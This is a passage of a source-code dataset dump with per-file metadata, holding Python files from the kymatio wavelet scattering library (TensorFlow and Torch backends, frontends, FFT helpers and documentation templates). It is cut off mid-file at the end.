"text": "import tensorflow as tf\nimport numpy as np\n\n\n\ndef _is_complex(x):\n return (x.dtype == np.complex64) or (x.dtype == np.complex128)\n\n\ndef _is_real(x):\n return (x.dtype == np.float32) or (x.dtype == np.float64)\n\n\nclass Modulus():\n \"\"\"This class implements a modulus transform for complex numbers.\n\n Parameters\n ----------\n x: input complex tensor.\n\n Returns\n ----------\n output: a complex tensor equal to the modulus of x.\n\n Usage\n ----------\n modulus = Modulus()\n x_mod = modulus(x)\n \"\"\"\n def __call__(self, x):\n norm = tf.abs(x)\n return tf.cast(norm, tf.complex64)\n\n\ndef real(x):\n \"\"\"Real part of complex tensor\n Takes the real part of a complex tensor, where the last axis corresponds\n to the real and imaginary parts.\n Parameters\n ----------\n x : tensor\n A complex tensor (that is, whose last dimension is equal to 2).\n Returns\n -------\n x_real : tensor\n The tensor x[..., 0] which is interpreted as the real part of x.\n \"\"\"\n return tf.math.real(x)\n\n\ndef concatenate(arrays, dim):\n return tf.stack(arrays, axis=dim)\n\n\ndef cdgmm(A, B, inplace=False):\n \"\"\"\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n Parameters\n ----------\n A : tensor\n A is a complex tensor of size (B, C, M, N, 2)\n B : tensor\n B is a complex tensor of size (M, N) or real tensor of (M, N)\n inplace : boolean, optional\n if set to True, all the operations are performed inplace\n Returns\n -------\n C : tensor\n output tensor of size (B, C, M, N, 2) such that:\n C[b, c, m, n, :] = A[b, c, m, n, :] * B[m, n, :]\n \"\"\"\n\n if not _is_complex(A):\n raise TypeError('The first input must be complex.')\n\n if A.shape[-len(B.shape):] != B.shape[:]:\n raise RuntimeError('The inputs are not compatible for multiplication.')\n\n if not _is_complex(B) and not _is_real(B):\n raise TypeError('The second input must be complex or real.')\n\n return A * B\n\n\ndef sanity_check(x):\n if not _is_complex(x):\n raise TypeError('The input should be complex.')\n\n if not x.is_contiguous():\n raise RuntimeError('Tensors must be contiguous.')\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 40.06666564941406,
"blob_id": "3c739acb8a628aee9d756d5ac7f616c0f8812f99",
"content_id": "c64a60bdfb7fd81273089f7de93164d4807452ba",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/kymatio/numpy.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.numpy_frontend import ScatteringNumPy1D as Scattering1D\nfrom .scattering2d.frontend.numpy_frontend import ScatteringNumPy2D as Scattering2D\nfrom .scattering3d.frontend.numpy_frontend \\\n import HarmonicScatteringNumPy3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.numpy'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.numpy'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.numpy'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.5598759651184082,
"alphanum_fraction": 0.5682252049446106,
"avg_line_length": 32.269840240478516,
"blob_id": "c3cc006e289e47c4047083c765d28b288483885b",
"content_id": "bbac52b6d331c100dc6afd84598ae89d0ca84d2f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4192,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 126,
"path": "/kymatio/scattering2d/frontend/torch_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom .base_frontend import ScatteringBase2D\nfrom ...scattering2d.core.scattering2d import scattering2d\nfrom ...frontend.torch_frontend import ScatteringTorch\n\n\nclass ScatteringTorch2D(ScatteringTorch, ScatteringBase2D):\n def __init__(self, J, shape, L=8, max_order=2, pre_pad=False,\n backend='torch', out_type='array'):\n ScatteringTorch.__init__(self)\n ScatteringBase2D.__init__(**locals())\n ScatteringBase2D._instantiate_backend(self, 'kymatio.scattering2d.backend.')\n ScatteringBase2D.build(self)\n ScatteringBase2D.create_filters(self)\n\n if pre_pad:\n # Need to cast to complex in Torch\n self.pad = lambda x: x.reshape(x.shape + (1,))\n\n self.register_filters()\n\n def register_single_filter(self, v, n):\n current_filter = torch.from_numpy(v).unsqueeze(-1)\n self.register_buffer('tensor' + str(n), current_filter)\n return current_filter\n\n def register_filters(self):\n \"\"\" This function run the filterbank function that\n will create the filters as numpy array, and then, it\n saves those arrays as module's buffers.\"\"\"\n # Create the filters\n\n n = 0\n\n for c, phi in self.phi.items():\n if not isinstance(c, int):\n continue\n\n self.phi[c] = self.register_single_filter(phi, n)\n n = n + 1\n\n for j in range(len(self.psi)):\n for k, v in self.psi[j].items():\n if not isinstance(k, int):\n continue\n\n self.psi[j][k] = self.register_single_filter(v, n)\n n = n + 1\n\n def load_single_filter(self, n, buffer_dict):\n return buffer_dict['tensor' + str(n)]\n\n def load_filters(self):\n \"\"\" This function loads filters from the module's buffers \"\"\"\n # each time scattering is run, one needs to make sure self.psi and self.phi point to\n # the correct buffers\n buffer_dict = dict(self.named_buffers())\n\n n = 0\n\n phis = self.phi\n for c, phi in phis.items():\n if not isinstance(c, int):\n continue\n\n phis[c] = self.load_single_filter(n, buffer_dict)\n n = n + 1\n\n psis = self.psi\n for j in range(len(psis)):\n for k, v in psis[j].items():\n if not isinstance(k, int):\n continue\n\n psis[j][k] = self.load_single_filter(n, buffer_dict)\n n = n + 1\n\n return phis, psis\n\n def scattering(self, input):\n if not torch.is_tensor(input):\n raise TypeError('The input should be a PyTorch Tensor.')\n\n if len(input.shape) < 2:\n raise RuntimeError('Input tensor must have at least two dimensions.')\n\n if not input.is_contiguous():\n raise RuntimeError('Tensor must be contiguous.')\n\n if (input.shape[-1] != self.N or input.shape[-2] != self.M) and not self.pre_pad:\n raise RuntimeError('Tensor must be of spatial size (%i,%i).' % (self.M, self.N))\n\n if (input.shape[-1] != self.N_padded or input.shape[-2] != self.M_padded) and self.pre_pad:\n raise RuntimeError('Padded tensor must be of spatial size (%i,%i).' 
% (self.M_padded, self.N_padded))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n phi, psi = self.load_filters()\n\n batch_shape = input.shape[:-2]\n signal_shape = input.shape[-2:]\n\n input = input.reshape((-1,) + signal_shape)\n\n S = scattering2d(input, self.pad, self.unpad, self.backend, self.J,\n self.L, phi, psi, self.max_order, self.out_type)\n\n if self.out_type == 'array':\n scattering_shape = S.shape[-3:]\n S = S.reshape(batch_shape + scattering_shape)\n else:\n scattering_shape = S[0]['coef'].shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n for x in S:\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringTorch2D._document()\n\n\n__all__ = ['ScatteringTorch2D']\n"
},
{
"alpha_fraction": 0.5584185719490051,
"alphanum_fraction": 0.5712037682533264,
"avg_line_length": 26.481081008911133,
"blob_id": "39098e1f44fecb4fad421d13187c052478e9a89f",
"content_id": "96b2edcf21a571e01abcf3428dc215aac50af0cc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5084,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 185,
"path": "/kymatio/scattering3d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\nimport numpy as np\n\nfrom collections import namedtuple\n\n\nBACKEND_NAME = 'tensorflow'\n\n\ndef complex_modulus(x):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n x : tensor\n Input tensor whose complex modulus is to be calculated.\n\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus holds the\n result of the complex modulus.\n\n \"\"\"\n modulus = tf.abs(x)\n return modulus\n\n\ndef modulus_rotation(x, module):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O).\n module : tensor\n Tensor that holds the overall sum.\n\n Returns\n -------\n output : tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n\n which is covariant to 3D translations and rotations.\n\n \"\"\"\n if module is None:\n module = tf.zeros_like(x, tf.float32)\n else:\n module = module ** 2\n module += tf.abs(x) ** 2\n return tf.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n\n Parameters\n ----------\n input_array : tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n\n Returns\n -------\n integrals : tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n\n \"\"\"\n integrals = []\n for i_q, q in enumerate(integral_powers):\n integrals.append(tf.reduce_sum(tf.reshape(tf.pow(input_array, q), shape=(input_array.shape[0], -1)), axis=1))\n return tf.stack(integrals, axis=-1)\n\n\ndef fft(x, direction='C2C', inverse=False):\n \"\"\"FFT of a 3d signal.\n\n Example\n -------\n real = tf.random.uniform(128, 32, 32, 32)\n imag = tf.random.uniform(128, 32, 32, 32)\n\n x = tf.complex(real, imag)\n\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n\n x = fft(x_fft, inverse=True)\n x = fft(x_ifft, inverse=False)\n\n Parameters\n ----------\n input : tensor\n Complex input for the FFT.\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex.\n inverse : bool\n True for computing the inverse FFT.\n NB : If direction is equal to 'C2R', then an error is raised.\n\n Raises\n ------\n RuntimeError\n Raised in event we attempt to map from complex to real without\n inverse FFT.\n\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT')\n\n x = tf.cast(x, tf.complex64)\n\n if direction == 'C2R':\n output = tf.math.real(tf.signal.ifft3d(x, name='irfft3d'))\n elif direction == 'C2C':\n if inverse:\n output = tf.signal.ifft3d(x, name='ifft3d')\n else:\n output = tf.signal.fft3d(x, name='fft3d')\n return tf.cast(output, tf.complex64)\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : tensor\n Complex tensor.\n B : tensor\n Complex tensor of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Returns\n -------\n output : tensor\n Tensor of 
the same size as A containing the result of the elementwise\n complex multiplication of A with B.\n\n \"\"\"\n if B.ndim != 3:\n raise RuntimeError('The dimension of the second input must be 3.')\n\n Cr = tf.cast(tf.math.real(A) * np.real(B) - tf.math.imag(A) * np.imag(B), tf.complex64)\n Ci = tf.cast(tf.math.real(A) * np.imag(B) + tf.math.imag(A) * np.real(B), tf.complex64)\n\n return Cr + 1.0j * Ci\n\n\ndef concatenate(arrays, L):\n S = tf.stack(arrays, axis=1)\n S = tf.reshape(S, tuple((S.shape[0], S.shape[1] // (L + 1), (L + 1))) + tuple(S.shape[2:]))\n return S\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm3d', 'fft', 'modulus', 'modulus_rotation', 'compute_integrals'])\n\nbackend.name = 'tensorflow'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\nbackend.concatenate = concatenate\n"
},
{
"alpha_fraction": 0.6025047898292542,
"alphanum_fraction": 0.6081806421279907,
"avg_line_length": 42.690025329589844,
"blob_id": "ef1364c8ecf32fa3342e19d1c24fc57e93bfd2b7",
"content_id": "eacc24d342f390c8a5e06a796d3981117a55ec6c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16209,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 371,
"path": "/kymatio/scattering1d/frontend/base_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.base_frontend import ScatteringBase\nimport math\nimport numbers\n\nimport numpy as np\n\nfrom ..filter_bank import scattering_filter_factory\nfrom ..utils import (compute_border_indices, compute_padding, compute_minimum_support_to_pad,\ncompute_meta_scattering, precompute_size_scattering)\n\n\nclass ScatteringBase1D(ScatteringBase):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend=None):\n super(ScatteringBase1D, self).__init__()\n self.J = J\n self.shape = shape\n self.Q = Q\n self.max_order = max_order\n self.average = average\n self.oversampling = oversampling\n self.vectorize = vectorize\n self.out_type = out_type\n self.backend = backend\n\n def build(self):\n \"\"\"Set up padding and filters\n\n Certain internal data, such as the amount of padding and the wavelet\n filters to be used in the scattering transform, need to be computed\n from the parameters given during construction. This function is called\n automatically during object creation and no subsequent calls are\n therefore needed.\n \"\"\"\n self.r_psi = math.sqrt(0.5)\n self.sigma0 = 0.1\n self.alpha = 5.\n self.P_max = 5\n self.eps = 1e-7\n self.criterion_amplitude = 1e-3\n self.normalize = 'l1'\n\n # check the shape\n if isinstance(self.shape, numbers.Integral):\n self.T = self.shape\n elif isinstance(self.shape, tuple):\n self.T = self.shape[0]\n if len(self.shape) > 1:\n raise ValueError(\"If shape is specified as a tuple, it must \"\n \"have exactly one element\")\n else:\n raise ValueError(\"shape must be an integer or a 1-tuple\")\n\n # Compute the minimum support to pad (ideally)\n min_to_pad = compute_minimum_support_to_pad(\n self.T, self.J, self.Q, r_psi=self.r_psi, sigma0=self.sigma0,\n alpha=self.alpha, P_max=self.P_max, eps=self.eps,\n criterion_amplitude=self.criterion_amplitude,\n normalize=self.normalize)\n # to avoid padding more than T - 1 on the left and on the right,\n # since otherwise torch sends nans\n J_max_support = int(np.floor(np.log2(3 * self.T - 2)))\n self.J_pad = min(int(np.ceil(np.log2(self.T + 2 * min_to_pad))),\n J_max_support)\n # compute the padding quantities:\n self.pad_left, self.pad_right = compute_padding(self.J_pad, self.T)\n # compute start and end indices\n self.ind_start, self.ind_end = compute_border_indices(\n self.J, self.pad_left, self.pad_left + self.T)\n\n def create_filters(self):\n # Create the filters\n self.phi_f, self.psi1_f, self.psi2_f, _ = scattering_filter_factory(\n self.J_pad, self.J, self.Q, normalize=self.normalize,\n criterion_amplitude=self.criterion_amplitude,\n r_psi=self.r_psi, sigma0=self.sigma0, alpha=self.alpha,\n P_max=self.P_max, eps=self.eps)\n\n def meta(self):\n \"\"\"Get meta information on the transform\n\n Calls the static method `compute_meta_scattering()` with the\n parameters of the transform object.\n\n Returns\n ------\n meta : dictionary\n See the documentation for `compute_meta_scattering()`.\n \"\"\"\n return compute_meta_scattering(self.J, self.Q, max_order=self.max_order)\n\n def output_size(self, detail=False):\n \"\"\"Get size of the scattering transform\n\n Calls the static method `precompute_size_scattering()` with the\n parameters of the transform object.\n\n Parameters\n ----------\n detail : boolean, optional\n Specifies whether to provide a detailed size (number of coefficient\n per order) or an aggregate size (total number of coefficients).\n\n Returns\n ------\n size : int or tuple\n See the documentation for 
`precompute_size_scattering()`.\n \"\"\"\n\n return precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=detail)\n\n _doc_shape = 'T'\n\n _doc_instantiation_shape = {True: 'S = Scattering1D(J, T, Q)',\n False: 'S = Scattering1D(J, Q)'}\n\n _doc_param_shape = \\\n r\"\"\"shape : int\n The length of the input signals.\n \"\"\"\n\n _doc_attrs_shape = \\\n r\"\"\"J_pad : int\n The logarithm of the padded length of the signals.\n pad_left : int\n The amount of padding to the left of the signal.\n pad_right : int\n The amount of padding to the right of the signal.\n phi_f : dictionary\n A dictionary containing the lowpass filter at all resolutions. See\n `filter_bank.scattering_filter_factory` for an exact description.\n psi1_f : dictionary\n A dictionary containing all the first-order wavelet filters, each\n represented as a dictionary containing that filter at all\n resolutions. See `filter_bank.scattering_filter_factory` for an\n exact description.\n psi2_f : dictionary\n A dictionary containing all the second-order wavelet filters, each\n represented as a dictionary containing that filter at all\n resolutions. See `filter_bank.scattering_filter_factory` for an\n exact description.\n \"\"\"\n\n _doc_param_average = \\\n r\"\"\"average : boolean, optional\n Determines whether the output is averaged in time or not. The\n averaged output corresponds to the standard scattering transform,\n while the un-averaged output skips the last convolution by\n :math:`\\phi_J(t)`. This parameter may be modified after object\n creation. Defaults to `True`.\n \"\"\"\n\n _doc_attr_average = \\\n r\"\"\"average : boolean\n Controls whether the output should be averaged (the standard\n scattering transform) or not (resulting in wavelet modulus\n coefficients). Note that to obtain unaveraged output, the\n `vectorize` flag must be set to `False` or `out_type` must be set\n to `'list'`.\n \"\"\"\n\n _doc_param_vectorize = \\\n r\"\"\"vectorize : boolean, optional\n Determines wheter to return a vectorized scattering transform\n (that is, a large array containing the output) or a dictionary\n (where each entry corresponds to a separate scattering\n coefficient). This parameter may be modified after object\n creation. Deprecated in favor of `out_type` (see below). Defaults\n to True.\n out_type : str, optional\n The format of the output of a scattering transform. If set to\n `'list'`, then the output is a list containing each individual\n scattering coefficient with meta information. Otherwise, if set to\n `'array'`, the output is a large array containing the\n concatenation of all scattering coefficients. Defaults to\n `'array'`.\n \"\"\"\n\n _doc_attr_vectorize = \\\n r\"\"\"vectorize : boolean\n Controls whether the output should be vectorized into a single\n Tensor or collected into a dictionary. Deprecated in favor of\n `out_type`. For more details, see the documentation for\n `scattering`.\n out_type : str\n Specifices the output format of the transform, which is currently\n one of `'array'` or `'list`'. If `'array'`, the output is a large\n array containing the scattering coefficients. If `'list`', the\n output is a list of dictionaries, each containing a scattering\n coefficient along with meta information. For more information, see\n the documentation for `scattering`.\n \"\"\"\n\n _doc_class = \\\n r\"\"\"The 1D scattering transform\n\n The scattering transform computes a cascade of wavelet transforms\n alternated with a complex modulus non-linearity. 
The scattering\n transform of a 1D signal :math:`x(t)` may be written as\n\n $S_J x = [S_J^{{(0)}} x, S_J^{{(1)}} x, S_J^{{(2)}} x]$\n\n where\n\n $S_J^{{(0)}} x(t) = x \\star \\phi_J(t)$,\n\n $S_J^{{(1)}} x(t, \\lambda) = |x \\star \\psi_\\lambda^{{(1)}}| \\star \\phi_J$, and\n\n $S_J^{{(2)}} x(t, \\lambda, \\mu) = |\\,| x \\star \\psi_\\lambda^{{(1)}}| \\star \\psi_\\mu^{{(2)}} | \\star \\phi_J$.\n\n In the above formulas, :math:`\\star` denotes convolution in time. The\n filters $\\psi_\\lambda^{{(1)}}(t)$ and $\\psi_\\mu^{{(2)}}(t)$ are analytic\n wavelets with center frequencies $\\lambda$ and $\\mu$, while\n $\\phi_J(t)$ is a real lowpass filter centered at the zero frequency.\n\n The `Scattering1D` class implements the 1D scattering transform for a\n given set of filters whose parameters are specified at initialization.\n While the wavelets are fixed, other parameters may be changed after\n the object is created, such as whether to compute all of\n :math:`S_J^{{(0)}} x`, $S_J^{{(1)}} x$, and $S_J^{{(2)}} x$ or just\n $S_J^{{(0)}} x$ and $S_J^{{(1)}} x$.\n {frontend_paragraph}\n Given an input `{array}` `x` of shape `(B, T)`, where `B` is the\n number of signals to transform (the batch size) and `T` is the length\n of the signal, we compute its scattering transform by passing it to\n the `scattering` method (or calling the alias `{alias_name}`). Note\n that `B` can be one, in which case it may be omitted, giving an input\n of shape `(T,)`.\n\n Example\n -------\n ::\n\n # Set the parameters of the scattering transform.\n J = 6\n T = 2 ** 13\n Q = 8\n\n # Generate a sample signal.\n x = {sample}\n\n # Define a Scattering1D object.\n {instantiation}\n\n # Calculate the scattering transform.\n Sx = S.scattering(x)\n\n # Equivalently, use the alias.\n Sx = S{alias_call}(x)\n\n Above, the length of the signal is :math:`T = 2^{{13}} = 8192`, while the\n maximum scale of the scattering transform is set to :math:`2^J = 2^6 =\n 64`. The time-frequency resolution of the first-order wavelets\n :math:`\\psi_\\lambda^{{(1)}}(t)` is set to `Q = 8` wavelets per octave.\n The second-order wavelets :math:`\\psi_\\mu^{{(2)}}(t)` always have one\n wavelet per octave.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform. In other words,\n the maximum scale is given by :math:`2^J`.\n {param_shape}Q : int >= 1\n The number of first-order wavelets per octave (second-order\n wavelets are fixed to one wavelet per octave). Defaults to `1`.\n max_order : int, optional\n The maximum order of scattering coefficients to compute. Must be\n either `1` or `2`. Defaults to `2`.\n {param_average}oversampling : integer >= 0, optional\n Controls the oversampling factor relative to the default as a\n power of two. Since the convolving by wavelets (or lowpass\n filters) and taking the modulus reduces the high-frequency content\n of the signal, we can subsample to save space and improve\n performance. However, this may reduce precision in the\n calculation. If this is not desirable, `oversampling` can be set\n to a large value to prevent too much subsampling. This parameter\n may be modified after object creation. Defaults to `0`.\n {param_vectorize}\n Attributes\n ----------\n J : int\n The maximum log-scale of the scattering transform. 
In other words,\n the maximum scale is given by `2 ** J`.\n {param_shape}Q : int\n The number of first-order wavelets per octave (second-order\n wavelets are fixed to one wavelet per octave).\n {attrs_shape}max_order : int\n The maximum scattering order of the transform.\n {attr_average}oversampling : int\n The number of powers of two to oversample the output compared to\n the default subsampling rate determined from the filters.\n {attr_vectorize}\"\"\"\n\n _doc_scattering = \\\n \"\"\"Apply the scattering transform\n\n Given an input `{array}` of size `(B, T)`, where `B` is the batch\n size (it can be potentially an integer or a shape) and `T` is the length\n of the individual signals, this function computes its scattering\n transform. If the `vectorize` flag is set to `True` (or if it is not\n available in this frontend), the output is in the form of a `{array}`\n or size `(B, C, T1)`, where `T1` is the signal length after subsampling\n to the scale :math:`2^J` (with the appropriate oversampling factor to\n reduce aliasing), and `C` is the number of scattering coefficients. If\n `vectorize` is set `False`, however, the output is a dictionary\n containing `C` keys, each a tuple whose length corresponds to the\n scattering order and whose elements are the sequence of filter indices\n used.\n\n Note that the `vectorize` flag has been deprecated in favor of the\n `out_type` parameter. If this is set to `'array'` (the default), the\n `vectorize` flag is still respected, but if not, `out_type` takes\n precedence. The two current output types are `'array'` and `'list'`.\n The former gives the type of output described above. If set to\n `'list'`, however, the output is a list of dictionaries, each\n dictionary corresponding to a scattering coefficient and its associated\n meta information. The coefficient is stored under the `'coef'` key,\n while other keys contain additional information, such as `'j'` (the\n scale of the filter used) and `'n`' (the filter index).\n\n Furthermore, if the `average` flag is set to `False`, these outputs\n are not averaged, but are simply the wavelet modulus coefficients of\n the filters.\n\n Parameters\n ----------\n x : {array}\n An input `{array}` of size `(B, T)`.\n\n Returns\n -------\n S : tensor or dictionary\n If `out_type` is `'array'` and the `vectorize` flag is `True`, the\n output is a{n} `{array}` containing the scattering coefficients,\n while if `vectorize` is `False`, it is a dictionary indexed by\n tuples of filter indices. 
If `out_type` is `'list'`, the output is\n a list of dictionaries as described above.\n \"\"\"\n\n @classmethod\n def _document(cls):\n instantiation = cls._doc_instantiation_shape[cls._doc_has_shape]\n param_shape = cls._doc_param_shape if cls._doc_has_shape else ''\n attrs_shape = cls._doc_attrs_shape if cls._doc_has_shape else ''\n\n param_average = cls._doc_param_average if cls._doc_has_out_type else ''\n attr_average = cls._doc_attr_average if cls._doc_has_out_type else ''\n param_vectorize = cls._doc_param_vectorize if cls._doc_has_out_type else ''\n attr_vectorize = cls._doc_attr_vectorize if cls._doc_has_out_type else ''\n\n cls.__doc__ = ScatteringBase1D._doc_class.format(\n array=cls._doc_array,\n frontend_paragraph=cls._doc_frontend_paragraph,\n alias_name=cls._doc_alias_name,\n alias_call=cls._doc_alias_call,\n instantiation=instantiation,\n param_shape=param_shape,\n attrs_shape=attrs_shape,\n param_average=param_average,\n attr_average=attr_average,\n param_vectorize=param_vectorize,\n attr_vectorize=attr_vectorize,\n sample=cls._doc_sample.format(shape=cls._doc_shape))\n\n cls.scattering.__doc__ = ScatteringBase1D._doc_scattering.format(\n array=cls._doc_array,\n n=cls._doc_array_n)\n\n\n__all__ = ['ScatteringBase1D']\n"
},
{
"alpha_fraction": 0.7670196890830994,
"alphanum_fraction": 0.7987897396087646,
"avg_line_length": 43.06666564941406,
"blob_id": "d18ccaa2dc30b1e9e9b564d0a03b64124dbdc03f",
"content_id": "042c8d7c5cde95b5c25712799c45d1782cfa254d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 15,
"path": "/kymatio/tensorflow.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.tensorflow_frontend import ScatteringTensorFlow1D as Scattering1D\nfrom .scattering2d.frontend.tensorflow_frontend import ScatteringTensorFlow2D as Scattering2D\nfrom .scattering3d.frontend.tensorflow_frontend \\\n import HarmonicScatteringTensorFlow3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.tensorflow'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.tensorflow'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.tensorflow'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.49059829115867615,
"alphanum_fraction": 0.5002849102020264,
"avg_line_length": 30.303571701049805,
"blob_id": "b2c261e1387cad586c2c92a5bc83286b7754bd4c",
"content_id": "bee350adc3e88c4a81d8c6ace2e4f4b6a1f119a8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1755,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 56,
"path": "/kymatio/backend/base_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "\n\nclass FFT:\n def __init__(self, fft, ifft, irfft, type_checks):\n self.fft = fft\n self.ifft = ifft\n self.irfft = irfft\n self.sanity_checks = type_checks\n\n def fft_forward(self, x, direction='C2C', inverse=False):\n \"\"\"Interface with FFT routines for any dimensional signals and any backend signals.\n\n Example (for Torch)\n -------\n x = torch.randn(128, 32, 32, 2)\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n\n Parameters\n ----------\n x : input\n Complex input for the FFT.\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex.\n inverse : bool\n True for computing the inverse FFT.\n NB : If direction is equal to 'C2R', then an error is raised.\n\n Raises\n ------\n RuntimeError\n In the event that we are going from complex to real and not doing\n the inverse FFT or in the event x is not contiguous.\n\n\n Returns\n -------\n output :\n Result of FFT or IFFT.\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT.')\n\n self.sanity_checks(x)\n\n if direction == 'C2R':\n output = self.irfft(x)\n elif direction == 'C2C':\n if inverse:\n output = self.ifft(x)\n else:\n output = self.fft(x)\n\n return output\n\n def __call__(self, x, direction='C2C', inverse=False):\n return self.fft_forward(x, direction=direction, inverse=inverse)\n"
},
{
"alpha_fraction": 0.6214421391487122,
"alphanum_fraction": 0.6306926012039185,
"avg_line_length": 31.430768966674805,
"blob_id": "c834a37c86b13cb0fc0c76c6341e7c4176e49888",
"content_id": "97e8366eb995ba5691eb20d8912b6bc9b0801d4e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4216,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 130,
"path": "/kymatio/scattering1d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Joakim Anden, Mathieu Andreux\nimport tensorflow as tf\nfrom collections import namedtuple\n\n\nBACKEND_NAME = 'tensorflow'\n\n\nfrom ...backend.tensorflow_backend import Modulus, real, concatenate, cdgmm\nfrom ...backend.base_backend import FFT\n\ndef subsample_fourier(x, k):\n \"\"\"Subsampling in the Fourier domain\n Subsampling in the temporal domain amounts to periodization in the Fourier\n domain, so the input is periodized according to the subsampling factor.\n Parameters\n ----------\n x : tensor\n Input tensor with at least 3 dimensions, where the next to last\n corresponds to the frequency index in the standard PyTorch FFT\n ordering. The length of this dimension should be a power of 2 to\n avoid errors. The last dimension should represent the real and\n imaginary parts of the Fourier transform.\n k : int\n The subsampling factor.\n Returns\n -------\n res : tensor\n The input tensor periodized along the next to last axis to yield a\n tensor of size x.shape[-2] // k along that dimension.\n \"\"\"\n\n N = x.shape[-1]\n y = tf.reshape(x, (-1, k, N // k))\n\n return tf.reduce_mean(y, axis=(1,))\n\n\ndef pad_1d(x, pad_left, pad_right, mode='constant', value=0.):\n \"\"\"Pad real 1D tensors\n 1D implementation of the padding function for real PyTorch tensors.\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n mode : string, optional\n Padding mode. Options include 'constant' and 'reflect'. See the\n PyTorch API for other options. Defaults to 'constant'.\n value : float, optional\n If mode == 'constant', value to input within the padding. 
